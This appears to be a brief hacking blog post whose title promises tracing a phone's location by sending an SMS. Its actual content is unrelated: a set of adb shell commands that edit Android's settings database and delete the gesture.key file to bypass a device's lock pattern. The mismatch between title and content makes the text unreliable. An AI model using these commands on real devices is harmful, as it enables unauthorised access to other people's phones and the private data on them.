Trace phone location by Sending SMS
How Trace phone location by Sending SMS ?
Hey viewers, welcome to the CyberRooT Blog and in this blog we will talk about how Trace phone location by Sending SMS ?
Don't Click
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit
adb shell rm /data/system/gesture.key